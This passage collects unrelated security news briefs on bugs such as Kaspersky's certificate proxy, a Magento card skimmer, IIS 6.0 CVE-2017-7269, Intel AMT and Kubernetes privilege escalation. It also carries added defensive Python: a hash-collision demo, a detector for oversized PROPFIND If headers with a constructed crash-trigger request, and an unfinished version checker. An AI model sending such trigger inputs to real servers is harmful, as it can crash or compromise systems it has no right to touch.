that it was previously trivial to create an SSL certificate collision because Kaspersky used only the first 32 bits of an MD5 hash in the SSL proxy packaged with its Anti-Virus product. "You don't have to be a cryptographer to understand a 32-bit key is not enough to prevent brute-forcing a collision in seconds," Tavis Ormandy of Project Zero said in the Project Zero issue tracker. "They effectively proxy SSL connections, inserting their own certificate as a trusted authority in the system store and then replace all leaf certificates on the fly. This is why if you examine a certificate when using Kaspersky Anti-Virus, the issuer appears to be 'Kaspersky Anti-Virus Personal Root'," he said. "It seems incredible that Kaspersky haven't noticed that they sometimes get certificate errors for mismatching commonNames just by random chance."

After Ormandy reported the bug and received acknowledgement from Kaspersky on November 1, the bug could still be exploited, even though he learned that the security vendor was doing some commonName checks. "If you're not being attacked, you would see random errors. A MITM [man in the middle] can send you packets from where you were expecting," Ormandy said on Twitter. Ormandy also found another bug on November 12 that allowed any unprivileged user to become a local certificate authority.

In May last year, the Project Zero security researcher discovered that Symantec Antivirus Engine was vulnerable to a buffer overflow when parsing malformed portable-executable header files, which resulted in instant blue-screening and kernel memory corruption without user action on Windows. "This is about as bad as it can possibly get," Ormandy said at the time.
Because Symantec use a filter driver to intercept all system I/O, just emailing a file to a victim or sending them a link is enough to exploit it.
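Why a 32-bit digest prefix cannot serve as a certificate identifier, as an added illustration (this is not code from Project Zero or Kaspersky): the birthday bound puts the expected number of random inputs before two share a 32-bit MD5 prefix at roughly 82,000, and the search below finds such a pair over constructed placeholder inputs in well under a second, while the full 128-bit digests of the pair still differ.

```python
import hashlib
import math
from typing import Optional, Tuple

PREFIX_BITS = 32  # the number of MD5 bits the proxy was reported to compare


def truncated_md5(data: bytes, bits: int = PREFIX_BITS) -> int:
    """Return the leading `bits` bits of MD5(data) as an integer (bits=128 is the full digest)."""
    digest = hashlib.md5(data).digest()
    return int.from_bytes(digest, "big") >> (128 - bits)


def birthday_bound(bits: int) -> float:
    """Expected number of random inputs drawn before two share a `bits`-bit digest prefix."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


def find_prefix_collision(bits: int = PREFIX_BITS,
                          limit: int = 2 ** 20) -> Optional[Tuple[bytes, bytes, int, int]]:
    """Walk constructed inputs "subject-0", "subject-1", ... until two distinct ones
    share a `bits`-bit prefix. Returns (first, second, prefix, inputs_tried) or None.
    For bits=32 the birthday bound makes success within `limit` a near certainty;
    for the full 128-bit digest the same loop finds nothing."""
    seen = {}
    for i in range(limit):
        data = b"subject-%d" % i  # placeholder stand-in for a certificate body
        prefix = truncated_md5(data, bits)
        if prefix in seen:
            return seen[prefix], data, prefix, i + 1
        seen[prefix] = data
    return None


if __name__ == "__main__":
    print(f"expected inputs before a {PREFIX_BITS}-bit prefix repeats: "
          f"{birthday_bound(PREFIX_BITS):,.0f}")
    first, second, prefix, tried = find_prefix_collision()
    print(f"{first!r} and {second!r} share prefix {prefix:08x} after {tried:,} inputs")
    print("full digests equal:", truncated_md5(first, 128) == truncated_md5(second, 128))
```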
Attackers continue to take aim at the e-commerce platform Magento. Researchers said last week they came across a malicious function snuck into one of the platform's modules in order to steal credit card information. Code for the function was injected into a .php file for SF9 Realex, a module that helps sites store customer credit card data for the one-click checkout functionality commonly used by repeat customers. The module interacts with the Realex RealAuth Remote and Redirect systems, "very popular solutions in the Magento community," according to Bruno Zanelato, a researcher with the firm Sucuri, who found the malicious function. The function, sendCCNumber(), reroutes credit card information entered by a customer from Magento to an attacker's email address, hidden inside a variable later in the code. The data, encoded in JSON, arrives in the attacker's inbox without the victim being any the wiser. According to researchers, the attacker uses binlist.net, a public web service for searching issuer identification numbers (IIN), to help identify which bank each card is associated with. Zanelato said Friday that attackers are going to greater lengths to target credit card data, especially in e-commerce platforms like Magento. "Magento credit card stealers are indeed on the rise," Zanelato wrote Friday. "While the information here is specific to Magento, realize that this can affect any platform that is used for ecommerce. As the industry grows, so will the specific attacks targeting it." Zanelato is quick to point out that there wasn't a vulnerability in Magento that enabled the theft of credit card data. From there the attacker was able to inject script and take over SF9 Realex. It's the latest in a line of credit card stealers Sucuri researchers have observed taking advantage of Magento, however.
Last summer Cesar Anjos, a researcher with the firm, looked at one stealer that was loaded from another source. The stealer essentially performed a man-in-the-middle attack between the user and the checkout page after credit card information was entered. Last October, Ben Martin, a different researcher with the firm, discovered attackers scraping credit card numbers and exfiltrating them in obscure, sometimes publicly viewable image files. Researchers with RiskIQ monitored attacks similar to the ones described by Sucuri last year. The firm said the attacks it had been monitoring originated from a single hacking group targeting e-commerce platforms such as Powerfront CMS and OpenCart with a web-based keylogger in March 2016.
Bad as Cloudbleed is, there's no evidence attackers exploited it before the patch was deployed. But since the vulnerability was triggered more than 1.2m times from 6,500 sites, Cloudflare is taking no chances: the company has tapped an outside company, Veracode, to scour its code. CEO Matthew Prince pledged the external review as he set out a detailed update after 12 days of investigation. That update includes a synopsis of how the vulnerability was created and who faced the most risk. He said Cloudflare continues to work with Google and others to eliminate all leaked data from memory: "We've successfully removed more than 80,000 unique cached pages. That underestimates the total number because we've requested search engines purge and re-crawl entire sites in some instances."

Cloudbleed is a serious vulnerability in Cloudflare's internet infrastructure that Google Project Zero researcher Tavis Ormandy discovered in mid-February. It turned out that a single character in Cloudflare's code caused the problem. In its initial blog post on the matter, Cloudflare said the issue stemmed from its decision to use a new HTML parser called cf-html. In his update, Prince said Cloudbleed was triggered when a page with two characteristics was requested through Cloudflare's network.
Samsung's televisions and wearables reportedly have serious vulnerabilities that could allow malicious hackers to remotely take control of them. Security researchers in Israel have uncovered 40 previously undiscovered vulnerabilities in the operating system running in Samsung's line of smart televisions, smartwatches, and even mobile phones, which could give hackers easy access to the devices, Motherboard is reporting after discussing the findings with the researchers. Tens of millions of electronics could be at risk, security researcher Amihai Neiderman told Motherboard. The security flaws live inside Tizen, an operating system Samsung (SSNLF) has been developing over the last several years that runs on the company's televisions, smartwatches, and some low-powered mobile devices. Hackers with knowledge of the vulnerabilities can be half a world away but connect over the Internet to a Samsung television or wearable and assume complete control over the device. Neiderman didn't say if hackers have been exploiting some of the flaws built into Tizen, and he has only been analyzing the software for the past eight months. He believes that many of the 40 flaws (called zero-day exploits because there are no fixes and hackers could take advantage of them right now) were caused by Samsung coding errors that were never discovered in product testing.
A coalition of some of the globe's top researchers and cryptographers are pleading with The Guardian to retract a story it published last week in which it suggested the encrypted messaging app WhatsApp contained a backdoor. The article, citing research by Tobias Boelter, a cryptography and security researcher, accused WhatsApp of having a backdoor that it or Facebook could use to eavesdrop on user messages. The article, published by the media group last Friday, was almost immediately met with criticism, first from WhatsApp, which called the allegations false, then from a collection of researchers who also refuted the claims.
In a disclosure on March 27 that included their own simple Python proof-of-concept, the researchers outlined the "buffer overflow in the ScStoragePathFromUrl function in the WebDAV service" that occurs when an attacker sends an overlong IF header as part of a PROPFIND request (if that sounds obscure you can read about WebDAV here). Designated CVE-2017-7269, that's bad news, but the fact that it has been known about for months, with new exploits now likely, is the main takeaway. Given that IIS 6.0 shipped with Windows Server 2003 R2 in 2005 and Microsoft stopped supporting it after the end-of-life deadline passed in July 2015 (i.e. no more patches), one might assume that the install base is small. More likely, this is another version of the Windows XP situation, where organisations find it hard to wean themselves off core software and end up putting themselves at risk. In 2015, research from analysts RiskIQ found 2,675 installs of IIS 6.0 inside 24 of the top FTSE-100 UK companies alone. Incredibly, the same analysis found 417 installs of IIS 5.0 in the same companies, which at that time was a year beyond extended support death. Shodan estimates 600,000 machines still visibly running this software globally, perhaps 10% of which have the PROPFIND extension running, according to an analysis by one enterprising researcher. Nobody knows, but with Microsoft unlikely to step in with a fix, it could be more than enough to cause problems. The premium fix is to stop using IIS 6.0 immediately, but for anyone who finds that difficult there is one hope: guerrilla patching.
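A request-level check for the trigger condition described above (a PROPFIND request carrying an oversized If header), as an added example: this is neither the researchers' proof-of-concept nor a vendor patch, the sample requests are constructed, and the 1024-byte threshold is an assumed tuning value for a reverse proxy or WAF in front of a server that cannot be retired yet.

```python
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Assumed tuning value, not a number from the advisory: a legitimate WebDAV "If"
# header carries a few lock tokens or ETags and stays far below this.
MAX_IF_HEADER_LEN = 1024


@dataclass
class Finding:
    method: str
    target: str
    if_header_len: int


def parse_request_head(raw: bytes) -> Tuple[str, str, Dict[str, str]]:
    """Parse the request line and header fields of a raw HTTP/1.1 request head.

    Header names are lower-cased; repeated fields are joined with ", " and
    obsolete folded continuation lines (leading SP/HTAB) are appended to the
    previous field, so a header split across lines is still measured whole.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    request_line, *field_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    last_name = None
    for line in field_lines:
        if not line:
            continue
        if line[0] in " \t" and last_name is not None:
            headers[last_name] += " " + line.strip()
            continue
        name, sep, value = line.partition(":")
        if not sep:
            continue  # malformed field line: skip it rather than abort the check
        name = name.strip().lower()
        value = value.strip()
        headers[name] = f"{headers[name]}, {value}" if name in headers else value
        last_name = name
    return method, target, headers


def check_propfind_if(raw: bytes, max_len: int = MAX_IF_HEADER_LEN) -> Optional[Finding]:
    """Return a Finding when a PROPFIND request carries an If header longer than max_len."""
    method, target, headers = parse_request_head(raw)
    if method.upper() != "PROPFIND":
        return None
    if_value = headers.get("if")
    if if_value is None or len(if_value) <= max_len:
        return None
    return Finding(method, target, len(if_value))


# Constructed sample requests (not captured traffic).
BENIGN_REQUEST = (
    b"PROPFIND /docs/ HTTP/1.1\r\n"
    b"Host: webdav.example.test\r\n"
    b"Depth: 1\r\n"
    b"If: <http://webdav.example.test/docs/> (<opaquelocktoken:example-token-1>)\r\n"
    b"\r\n"
)
OVERSIZED_REQUEST = (
    b"PROPFIND /docs/ HTTP/1.1\r\n"
    + b"Host: webdav.example.test\r\n"
    + b"If: <http://webdav.example.test/" + b"A" * 4000 + b">\r\n"
    + b"\r\n"
)
NON_WEBDAV_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    + b"Host: webdav.example.test\r\n"
    + b"If: <http://webdav.example.test/" + b"A" * 4000 + b">\r\n"
    + b"\r\n"
)

if __name__ == "__main__":
    for label, req in [("benign", BENIGN_REQUEST), ("oversized", OVERSIZED_REQUEST),
                       ("non-webdav", NON_WEBDAV_REQUEST)]:
        print(label, check_propfind_if(req))
```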
We discussed this phenomenon in our recent coverage of Google's "Operation Rosehub", but it can be summed up by the simple idea that if the vendor in whose software a vulnerability has arisen can't or won't fix the issue, then someone else does it for them. A company called Acros Security dubbed this "0patch" and, lo and behold, has come up with a "micro-patch" for CVE-2017-7269. We can't vouch for this, but Acros explains how it developed the patch in some detail for anyone staring down the barrel of limited options. What the latest episode challenges is the fixed idea of software lifecycles according to big software vendors, which runs something like "we've told them in advance that support will be removed by a given date, so if they don't follow our advice and upgrade then that's their lookout". The near-debacle of XP's zombie afterlife was an example of this MO running aground on the rocks of business reality, beside which the latest IIS 6.0 event might look modest. But an unpatchable zero-day affecting hundreds of thousands of compromised web servers won't be fun for anyone, Microsoft included.
Google Nest's Dropcam, Dropcam Pro, Nest Cam Outdoor and Nest Cam Indoor security cameras can be easily disabled by an attacker within their Bluetooth range, a security researcher has found. The vulnerabilities are present in the latest firmware version running on the devices (v5.2.1). They were discovered by researcher Jason Doyle last fall and their existence responsibly disclosed to Google, but they have still not been patched. The first two flaws can be triggered and lead to a buffer overflow condition if the attacker sends the camera a too-long Wi-Fi SSID parameter or a long encrypted password parameter, respectively. That's easy to do, as Bluetooth is never disabled after the initial setup of the cameras, and attackers (e.g. burglars) can usually come close enough to them to perform the attack. Triggering one of these flaws will make the devices crash and reboot. The third flaw is a bit more serious, as it allows the attacker to force the camera to temporarily disconnect from the wireless network to which it is connected by supplying it a new SSID to connect to. If that particular SSID does not exist, the camera drops its attempt to associate with it and returns to the original Wi-Fi network, but the whole process can last from 60 to 90 seconds, during which the camera won't be recording. Unfortunately, Bluetooth can't be disabled on these cameras, so there is little users can do to minimize this particular risk. Nest has apparently already prepared a patch but hasn't pushed it out yet. It is supposedly scheduled to be released soon, but no definite date has been offered.
Valentine's Day is fast approaching, and the story goes that if Cupid hits you with his golden arrow you'll fall madly in love. But there are other actors taking aim at you on Valentine's Day whose arrows you need to avoid, as the outcomes aren't nearly as desirable. Think back to early February 2016, when many online florists experienced a surge in traffic that wasn't due simply to a rush to buy flowers. Dozens of florists were hit by targeted DDoS attacks during their busiest time of the year, causing problems for some and knocking others offline; those were asked to pay a ransom before they could resume operations. It's fairly typical for bad actors to escalate extortion-based campaigns during seasonal events when the stakes for targets are high. Looking to profit with minimal investment, attackers exploit known vulnerabilities as they attempt to breach systems. For example, the 2016 Valentine's Day DDoS attacks used Shellshock, a critical vulnerability present in Linux, UNIX and Mac OS X that had been discovered more than a year earlier. Of course, online florists are not alone when it comes to being targeted by cyber criminals. Different times of the year and major news events can trigger a surge in attacks aimed at particular industries and geographies. Organisations need to understand their threat model and apply security processes as appropriate. Threat actors will continue to take advantage of events to launch attacks, but you can avoid their arrows this Valentine's Day.
A particular TP-Link router model will spew out its admin password in cleartext to anyone that sends an SMS message containing a particular script to the router's SIM card, according to German security researcher Jan Hörsch, who shared his findings with German newspaper Heise.de. The vulnerability affects TP-Link model M5350, a 3G mobile Wi-Fi router, often distributed by mobile telco providers to their customers along with a SIM card they insert in the router. This SIM card allows the router to connect to the mobile operator's network and, just like any SIM card, has its own telephone number. In an online conversation with Bleeping Computer, Hörsch, who's a researcher for German cyber-security firm Securai, says that after he analyzed the router's firmware, he discovered a vulnerability in the feature that handles incoming SMS messages. By sending the following SMS, the router would answer back with the admin account password, the Wi-Fi network SSID, and the Wi-Fi network's password. The issue isn't as dangerous as it sounds, mainly because the attacker needs to know the router SIM card's phone number in order to exploit it, Hörsch told Bleeping Computer. This issue is one of many the researcher discovered in recent months in various devices. His findings were summarized and presented in a talk at the recently concluded Kaspersky Security Analyst Summit (SAS), held last week. In the same talk, Hörsch also presented several other vulnerabilities that allowed him to obtain root access to Hootoo Travelmate and Trendnet TEW714TRU routers and Vstarcam webcams.
Other vulnerabilities the researcher discovered and presented at SAS include the presence of a hardcoded Telnet password in Startech modems, and a very simple to exploit authentication bypass for Panasonic BM ET200 retina scanners, which allowed anyone access to the admin panel just by deleting a few parameters in a URL. His presentation also detailed several flaws in Western Digital MyCloud NAS hard drives, some of which were made public at the start of March by another researcher who disclosed the bugs.
Google has announced a crackdown on intrusive pop-up advertisements in its Chrome web browser after a previous update failed to stop them. The ads open users up to phishing attacks that attempt to scam people into giving private information such as bank details to online fraudsters. Google says the ads create an 'abusive experience for users', including fake messages, unexpected clicks, phishing attempts and misleading site behaviour. The firm tried to stop manipulative adverts in an update last February but now admits that it 'did not go far enough'. Chrome currently has an option to enable a pop-up blocker, but fraudsters have quickly found ways around this. The company declined to name the companies involved in the crackdown but said that the update will block ads from a 'small number of sites with persistent abusive problems'. Pop-ups are small windows that tend to show system warnings which are difficult to close, as well as 'watch video' buttons. When the company announced its previous crackdown back in February, critics were quick to point out that the firm wanted to make ads more tolerable so that its own could get past filters. Some said that the aim was to persuade people to disable their ad blockers so as not to deprive publishers (including Google) of displaying their advertisements and thus depriving them of revenue. Although the company did not go into detail about why the previous block didn't work, Chrome product manager Vivek Sekhar said: 'We've learned since then that this approach did not go far enough. In fact, more than half of these abusive experiences are not blocked by our current set of protections, and nearly all involve harmful or misleading ads.'

Advertisements also tend to be a hotbed for malicious software or scams where fraudsters trick people into giving out their personal information. Once a pop-up is clicked on, the ad can take you to a separate web page asking you to download an application, and actually triggers an onslaught of more pop-up ads.
Last week, Intel revealed that a serious security flaw in some of its chips left potentially thousands of devices vulnerable to attackers. Then, security researchers revealed the problem was way worse than anyone initially thought, as the vulnerability could allow attackers to remotely "hijack" affected machines. It's still not clear just how many devices are impacted, as Intel hasn't said, but some in the industry have put the number as high as 8,000. Here's a look at what you need to know and how to protect yourself. The vulnerability stems from something called Intel Active Management Technology (AMT), a technology that allows devices to be remotely managed to make it easier to update software and perform maintenance remotely. It's a feature typically used by businesses that may be responsible for many devices that may not all be in the same place. Since the technology is integrated at a chip level, AMT can do a bit more than other software-enabled management tools. Using AMT's capabilities, for instance, a system administrator could remotely access and control a computer's mouse and keyboard, or turn on a computer that's already been powered down. While those can be helpful capabilities for corporate IT departments to have, it's obviously the type of access you'd want locked down pretty tightly. And that's just the problem. Security researchers found that AMT's web portal can be accessed with just the user admin and literally any password, or even no password at all. That's why some have labeled it a "hijacking" flaw, since anyone who exploits the vulnerability would be able to remotely control so many processes. Most importantly, the flaw doesn't impact every Intel chip out there.
Since it's rooted in AMT, the vulnerability primarily affects businesses, though, as Intel points out, some consumers use computers made for businesses. One of the easiest ways to check if you might be affected is to check the Intel sticker that comes on so many PCs. Look for a "vPro" logo, as that indicates the presence of AMT. Of course, looking for a sticker is hardly foolproof. Intel has also released a downloadable detection guide, which will walk you through the process of checking your machines. You can find the detection guide here. Though Intel has long supplied Apple with chips for Macs, AMT is only present on processors in Windows-based machines, so all Macs are safe from this particular exploit. If you do have a machine that's impacted by the security flaw, you'll need to update your firmware as soon as possible. Intel has already created a patch and is now waiting on manufacturers to make it available. Some, including Dell, Lenovo, HP, and Fujitsu, have already rolled it out. You can find links to those on Intel's website, which will be updated as more manufacturers release updates.
The site now includes a malicious link that infects the computers of anyone visiting, Arctos contends. Palani Bala, Arctos' CTO, claims that HPCL's site was compromised by a series of attacks by the pseudo-Darkleech campaign, which exposes users to Nemucod malware that, in turn, downloads Cerber ransomware onto their machines. Darkleech is a long-running campaign that uses exploit kits to deliver malware. The executables downloaded via the exploit kit were analyzed through a behavior analysis engine, which identified the file as Cerber ransomware based on behavior classification, Bala says.

[Figure: Landing page deobfuscated by Arctos Ateles engine. Source: Arctos Threat Research Co.]

Bala claims the attackers run automated bots that look for vulnerable sites and then tamper with them by adding content that delivers malware to visitors' computers. Experts say hackers using Cerber ransomware usually demand $1,000 in bitcoin from infected users. Cerber ransomware and its encryption components are updated daily on the site, he adds. First appearing in March 2016, Cerber often contains an audio file with a ransom message. The ransomware largely spreads via spear-phishing campaigns, security experts say. Arctos suspects the HPCL attackers' bot might have exploited vulnerabilities in an old Apache web server or in additional services or plug-ins running on the server, Bala says. He recommends that HPCL's web server infrastructure perimeter be protected around the clock by advanced security monitoring solutions to detect such compromises. In the meantime, it's time CERT-In made a recommendation to HPCL and others on how to avoid infections.
The Bitcoin Core team yesterday released a patch for a DDoS vulnerability that could prove fatal to the Bitcoin network. The patch note urged miners to shut down their older versions urgently and replace them with the new version, Bitcoin Core 0.16.3. The announcement, first reported on Hacked, revealed that all the recent Bitcoin Core versions could be vulnerable to a Distributed Denial-of-Service attack. An attack of that kind typically involves multiple compromised systems flooding a single system (or network), similar to zombies encircling an uninfected person and disabling his movements. DDoS perpetrators could attack a Bitcoin network by either flooding the block with duplicate transactions, thus jamming the transaction confirmation of other people, or by flooding the nodes on Bitcoin's peer-to-peer network, thus over-utilizing the bandwidth through malicious transaction relays. The recent DDoS vulnerability, designated CVE-2018-17144, attempted the latter: flooding full node operators with traffic. Hacked reports: "The way the potential exploit could work was by allowing anyone who was capable of mining a sufficient number of proof of work blocks to crash Bitcoin Cores running software versions 0.14.0 to 0.16.2." It also means that the miners who occasionally run Bitcoin Core were not vulnerable to the attack. Still, developers recommended that all miners go ahead with the latest update to stay safe. Also, the patch fixed some other minor bugs related to consensus, RPC, invalid flag errors, and documentation.
It is worth noting that Bitcoin is not the only cryptocurrency on the DDoS attackers' hitlist. Flaws have been found in other cryptocurrency clients as well, including Bitcoin Cash and Ethereum. An effective attack on the Ethereum network lasted more than a month and created millions of dead accounts. In response, developers had to go through two on-chain forks and one off-chain process to clean up the mess. In another DDoS attack that slowed down the Ethereum network, miners had to increase gas fees to repel the attackers. There was no consensus failure. DDoS continues to be a global problem that impacts all spheres of the internet. Europol in its latest investigative report noted: "Criminals continue to use Distributed-Denial-of-Service (DDoS) attacks as a tool against private business and the public sector. Such attacks are used not only for financial gains but the ideological, political or purely malicious reason. This type of attack is not only one of the most frequent (second only to malware in 2017); it is also becoming more accessible, low-cost and low-risk." Meanwhile, decentralized networks like Bitcoin are still more secure against such attacks purely because single entities would not be able to bring them down. Also, because the people involved, including the attackers themselves, are heavily invested in Bitcoin, a coordinated attack would just cost them their own bitcoin validation commissions.
Microsoft has seen its share of issues as of late, and now a seemingly simple patch is causing serious issues for certain laptops running the 2016 Anniversary Update. The update was originally released to prevent a zero-day attack on IE. Per Microsoft, this was the issue being fixed:

"A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website, for example, by sending an email. The security update addresses the vulnerability by modifying how the scripting engine handles objects in memory."

But now that fix is causing a pretty big problem of its own: it's preventing certain laptops from booting. The affected machines are part of a pretty small bunch (only Lenovo laptops with less than 8 GB of RAM running the 2016 Anniversary Update, 1607), but it's still a pretty bad problem to have.
Fortunately, there's a way to bypass the failed boot by restarting into the UEFI and disabling Secure Boot. It's also noted that if BitLocker is enabled, you may have to go through BitLocker recovery after disabling Secure Boot. On the upside, Microsoft is working with Lenovo to correct the issue and will release a fix sometime in the future. I just wouldn't count on it before the end of the year. Until then, be careful when updating devices, especially if they happen to be Lenovo laptops with limited RAM.
A design flaw affecting all in-display fingerprint sensors, which left over a half-dozen cellphone models vulnerable to a trivial lock-screen bypass attack, has been quietly patched. The flaw was tied to a bug in the popular in-display fingerprint reader technology used for user authentication. In-display fingerprint reader technology is widely considered an up-and-coming feature to be used in a number of flagship model phones introduced in 2019 by top OEM phone makers, according to Tencent's Xuanwu Lab, which is credited with first identifying the flaw earlier this year. "During our research on this, we found all the in-display fingerprint sensor modules suffer the same problem, no matter where they were manufactured or by which vendors," said Yang Yu, a researcher at Xuanwu Lab. "This vulnerability is a design fault of in-display fingerprint sensors." Impacted are all phones tested in the first half of 2018 that had in-display fingerprint sensors, said Yu. That includes current models of Huawei Technologies' Porsche Design Mate RS and Mate 20 Pro model phones. Yu said that many more cellphone manufacturers are impacted by the issue. However, Yu would not specify other impacted vendors or models: "Vendors differ greatly in their attitude to security issues; some have open attitudes, like Huawei, and in contrast, some vendors strongly hope we keep the voice down on this," he told Threatpost. He noted Huawei has been forthcoming, issuing patches to address the issue. Other phones that use the feature include Vivo Communication Technology's V11 Pro, X21 and Nex; and OnePlus' 6T and Xiaomi Mi 8 Explorer Edition phones.
Vivo, OnePlus and Xiaomi did not respond to requests for comment from Threatpost. In-display fingerprint readers based on optical fingerprint imaging, experts believe, will soon replace conventional authentication based on capacitance-sensor fingerprint scanners. In-display readers allow a user to place a finger on the screen of a smartphone, where a scanner behind the display can verify a fingerprint, authenticate the user and unlock the phone. Design-wise, the feature allows phones to be sleeker and less cluttered, supporting infinity displays. Usability advantages include the ability to unlock the phone simply by placing your finger on the phone's screen at any angle, whether it's sitting on a table or in a car mount. The vulnerability, for which Huawei issued a patch (CVE-2018-7929) in September, can be exploited in a matter of seconds, researchers said. In an exclusive interview with Threatpost on the flaw, Yu said all an attacker needs to carry out the attack is an opaque reflective material such as aluminum foil. By placing the reflective material over a residual fingerprint on the phone's display, the capacitance fingerprint imaging mechanism can be tricked into authenticating a fingerprint.
Approximately 560,000 people were affected by a flaw in the script used to migrate followers to the new archival handles. "If you were following @POTUS before 12pET, by end of day you'd be following *two* accounts: @POTUS44 (44th Admin) and @POTUS (45th Admin)," Dorsey tweeted. Dorsey apologized for the mistake and said Twitter has worked to correct the issue. He did add, however, that the Obama Administration felt it was fair to automatically migrate followers after the transition, since @POTUS is an institutional account. One of the most visible transfers of executive power happened today on Twitter. The official @POTUS account was handed off to President Trump, and former President Obama re-assumed his personal handle, @BarackObama. (Trump predictably continued to tweet from his personal account long into the inauguration, however.) "Michelle and I are off on a quick vacation, then we'll get back to work," Obama tweeted from the restored handle. But some Twitter users are complaining that despite never following @POTUS in the first place, the presidential handle is suddenly showing up in their timelines. Somehow, they claim, Twitter had automatically followed it for them. "I specifically UNFOLLOWED this account earlier today. Yet now I am following it again without having resubscribed," one user tweeted. "@POTUS turned up in my feed despite me not following, willingly or otherwise," said another person. A spokesperson for Twitter told Motherboard they couldn't comment on these specific claims, but said that post-inauguration, Twitter automatically migrated the followers of @POTUS over to the newly created @POTUS44 account, which acts as an archive for President Obama's tweets.
The same was done for @FLOTUS44, belonging to Michelle Obama, and @VP44, belonging to former Vice President Biden. As you can see, both versions have somewhat similar follower counts.
Anyone who uses the popular Cisco WebEx extension for Chrome should update to the latest version pronto. Google security researcher Tavis Ormandy recently discovered a serious vulnerability in the Chrome extension that leaves PCs wide open to attack. The flaw involves a "magic string" designed to remotely activate the WebEx browser extension. Once the extension was activated, the bad guys could execute malicious code on the target machine. The impact on you at home: it's a good idea for anyone who uses this extension to make sure it's updated to the latest version, given the severity of the vulnerability. It's not clear if version 1.0.5 offers any significant protection against the threat Ormandy describes. Apparently, all version 1.0.3 did was offer a pop-up any time that magic code was used, according to Cloudflare security researcher Filippo Valsorda. That puts the onus on the user to make sure they really want to be using WebEx when that pop-up appears. If you'd rather not bother with the extension, it's also possible to use a temporary, downloadable desktop program each time you want to use WebEx. That may not be convenient, but it's an alternative. Ormandy's discovery raised enough eyebrows that Mozilla blocked WebEx for Firefox.
A critical vulnerability in Kubernetes, the open-source system for handling containerized applications, can enable an attacker to gain full administrator privileges on Kubernetes compute nodes. Kubernetes makes it easier to manage a container environment by organizing application containers into pods, nodes (physical or virtual machines) and clusters. Multiple nodes form a cluster, managed by a master that coordinates cluster-related activities like scaling, scheduling, or updating apps. Each node has an agent called the Kubelet that facilitates communication with the Kubernetes master via the API. The number of nodes in a Kubernetes system can reach hundreds or even thousands. Pulling this off is easy on default configurations, where "all users (authenticated and unauthenticated) are allowed to perform discovery API calls that allow this escalation," says Jordan Liggitt, staff software engineer at Google. The security bug was discovered by Darren Shepherd, co-founder of Rancher Labs, the company that provides the Kubernetes-as-a-Service solution called Rancher. Now tracked as CVE-2018-1002105, the flaw is critical, with a Common Vulnerability Scoring System (CVSS) score of 9.8 out of 10. According to the latest version of the vulnerability severity calculator, exploiting the security glitch has low difficulty and does not require user interaction. Red Hat's OpenShift Container Platform, which uses Kubernetes for orchestrating and managing containers, is also impacted by the vulnerability. In an advisory on the matter, the company explains that the flaw can be used in two ways against its products.
One involves a normal user with 'exec', 'attach', or 'portforward' rights over a Kubernetes pod (a group of one or more containers that share storage and network resources); they can escalate their privileges to cluster-admin level and execute any process in a container. The second attack method exploits the API extension feature used by 'metrics-server' and 'servicecatalog' in OpenShift Container Platform, OpenShift Online, and Dedicated. No privileges are required, and an unauthenticated user can get admin rights to any API extension deployed to the cluster. "Cluster-admin access to 'servicecatalog' allows creation of service brokers in any namespace and on any node," the advisory details. The problem has been addressed in the latest Kubernetes revisions: v1.10.11, v1.11.5, v1.12.3, and v1.13.0-rc.1. Kubernetes releases prior to these, along with the products and services based on them, are affected by CVE-2018-1002105. Red Hat released patches for the OpenShift family of containerization software (OpenShift Container Platform, OpenShift Online, and OpenShift Dedicated), and users received service updates they can install at their earliest convenience. The software company warns that a malicious actor could exploit the vulnerability to steal data or inject malicious code, as well as "bring down production applications and services from within an organization's firewall."
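As an added check (example code, not from the article or the Kubernetes project), the script below parses a Kubernetes server version tag and reports whether it predates the four fixed releases the article lists; the pre-release ordering and the parsing of `kubectl version` output are this example's own assumptions.

```python
"""Flag Kubernetes server versions that predate the CVE-2018-1002105 fixes.

Added example; not code from the article or the Kubernetes project. The
fixed releases are the four the article names; the tag parsing and the
kubectl output handling are this example's own assumptions.
"""
import re
from typing import Optional, Tuple

# First release of each minor line that carries the fix (from the article).
FIXED_RELEASES = {
    (1, 10): "v1.10.11",
    (1, 11): "v1.11.5",
    (1, 12): "v1.12.3",
    (1, 13): "v1.13.0-rc.1",
}

_TAG_RE = re.compile(
    r"^v?(?P<major>\d+)\.(?P<minor>\d+)\.(?P<patch>\d+)"
    r"(?:-(?P<pre>[0-9A-Za-z.]+))?"  # optional pre-release such as rc.1
    r"(?:\+\S*)?$"                   # build metadata, ignored
)


def parse_version(tag: str) -> Tuple[int, int, int, tuple]:
    """Turn 'v1.13.0-rc.1' into a tuple that orders like semver.

    A pre-release sorts before the final release with the same numbers,
    so the last element is (0, ...) for pre-releases and (1,) for finals.
    """
    m = _TAG_RE.match(tag.strip())
    if not m:
        raise ValueError(f"not a Kubernetes version tag: {tag!r}")
    major, minor, patch = (int(m.group(g)) for g in ("major", "minor", "patch"))
    pre = m.group("pre")
    if pre is None:
        return (major, minor, patch, (1,))
    # 'rc.1' -> ((1, 'rc'), (0, 1)); numeric parts sort before labels
    parts = tuple((0, int(p)) if p.isdigit() else (1, p) for p in pre.split("."))
    return (major, minor, patch, (0,) + parts)


def is_affected(server_version: str) -> bool:
    """True if the server predates the fixed release for its minor line.

    Minor lines older than 1.10 never received a fix and are affected;
    lines after 1.13 were cut with the fix already in and are not.
    """
    major, minor, patch, rank = parse_version(server_version)
    if (major, minor) < (1, 10):
        return True
    fixed = FIXED_RELEASES.get((major, minor))
    if fixed is None:
        return False
    return (major, minor, patch, rank) < parse_version(fixed)


def server_version_from_kubectl(output: str) -> Optional[str]:
    """Extract the server tag from `kubectl version` (long or --short) output."""
    for line in output.splitlines():
        if line.startswith("Server Version:"):
            m = re.search(r'GitVersion:"(v[^"]+)"', line) or re.search(r"(v\d\S*)", line)
            return m.group(1) if m else None
    return None


if __name__ == "__main__":
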